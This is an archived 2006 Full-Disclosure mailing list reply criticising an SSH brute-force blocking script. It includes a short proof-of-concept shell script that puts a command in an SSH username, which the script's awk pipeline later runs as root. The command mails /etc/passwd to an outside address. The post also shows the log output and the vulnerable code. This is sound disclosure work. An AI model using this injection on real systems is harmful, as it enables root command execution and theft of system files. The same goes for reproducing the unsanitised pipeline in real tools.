lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list] 
Date: Tue, 28 Nov 2006 15:42:19 +0000
From: Tavis Ormandy <taviso@...too.org>
To: "J. Oquendo" <sil@...iltrated.net>
Cc: full-disclosure <full-disclosure@...ts.grok.org.uk>,
	Thierry Zoller <Thierry@...ler.lu>
Subject: Re: SSH brute force blocking tool

On Tue, Nov 28, 2006 at 09:33:03AM -0500, J. Oquendo wrote:
> Thierry Zoller wrote:
> >Dear All,
> >
> >You are arguing over hypothesises where facts could rule. PLEASE someone
> >just setup the script on a test environment and present us your
> >results. Heck, it's not that we are discussing Metaproblems here,
> >these are computers.
> >
> >Just install and make a PoC and enhance security for all
> >for the sake of it. Thanks :)

Out of interest, I did just that. It turns out to be quite tricky to get
arbitrary shell commands in there as (at least on my system), ssh will
stop logging usernames after certain characters are encountered, such as
'/' or ':'.

However, it is certainly possible. Here is an example.

#!/bin/sh
command='$(x=$(pwd|head${IFS}-c1);$(cat<<<mail${IFS}full-disclosure@...ts.grok.org.uk)<${x}etc${x}passwd)'
ssh -o "BatchMode yes" "a a $command"@$1

Which produces log entries like this:
 
Nov 28 15:14:15 insomniac sshd[5897]: pam_succeed_if(sshd:auth): error retrieving information about user a a $(x=$(pwd|head${IFS}-c1);$(cat<<<mail${IFS}full-disclosure@...ts.grok.org.uk)<${x}etc${x}passwd)
Nov 28 15:14:15 insomniac sshd[5897]: Failed password for invalid user a a $(x=$(pwd|head${IFS}-c1);$(cat<<<mail${IFS}full-disclosure@...ts.grok.org.uk)<${x}etc${x}passwd) from 127.0.0.1 port 47403 ssh2

Note that the 13th field both contains a dot and is entirely controlled
by me. This string is placed in /etc/hosts.deny by the script after
executed by cron.

The $1 in the awk script below is the entire string, which is piped
unsanitised into /bin/sh:

awk '!/#/ && /\./ && !a[$0]++
{print "iptables -A INPUT -s "$1" -i eth0 -d '$ifaddr' -p TCP --dport 22
-j REJECT"}' /etc/hosts.deny |\
awk '/iptables/ && !/#/ && !/-s  -i/'|sh

The results are obvious.

> The problem with the whole thread was "well someone could do XXX" Sure 
> they could... Anyone could... My point was someone shooting a message 
> back to the list stating "Your program is a backdoor".

Yes, I wrongly assumed you had malicious intentions, but are actually
just an inexperienced programmer. I apologise for this.

> It never was and 
> it never will be. Can someone modify it on their own and make it a 
> backdoor? Sure. Can someone inject something into the columns I was 
> parsing, possible. Anything is possible. Since then I re-wrote arguments 
> people were griping about:

Yes, although your code is still very fragile and relies on unique
strings appearing in the logs. I certainly wouldnt want all that extra
code running as root on untrusted input.

> ifaddr=`ifconfig -a|awk '/inet/ && !/inet6/ && !/127.0/ && 
> !/192.168/{print $2}'|sed 's/addr\://g'`
> 
> function IPT {
> 
> grep -E 
> '(25[0-5]|2[0-4][0-9]|1[0-9][0-9]|[1-9][0-9]|[1-9])(\.(25[0-5]|2[0-4][0-9]|1[0-9][0-9]|[1-9][0-9]|[0-9])){3}' 
> /etc/hosts.deny|\
> awk '!/#/&&/\./&&!a[$0]++
> {print "iptables -A INPUT -s "$1" -i eth0 -d '$ifaddr' -p TCP --dport 22 
> -j REJECT"}'|\
> awk '/iptables/&&!/#/&&!/-s  -i/'|sh
> 
> }

You also still havnt solved the problem of an attacker adding arbitrary
addressed to hosts.deny.

> The complaint was "anyone can insert $foo into the thirteenth column"... 
> Try it instead of mouthing off about it. "Someone can possible inject 
> tartar sauce into a sealed jar" Is it possible, sure it probably is, 
> show me though instead of yapping off. Someone else griped, "someone can 
> craftily insert your own address into an IP table." Look if someone is 
> THAT stupid of an admin to not test things first, modify it to their 
> needs, and gets themselves locked out of their own machine, they have no 
> business on that machine. Period.

J, what would testing achieve? An attacker simply needs to know an
important address to block. Your code is very naive and fragile, and
should be avoided.

Thanks, Tavis.

-- 
-------------------------------------
taviso@....lonestar.org | finger me for my pgp key.
-------------------------------------------------------

Content of type "application/pgp-signature" skipped

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ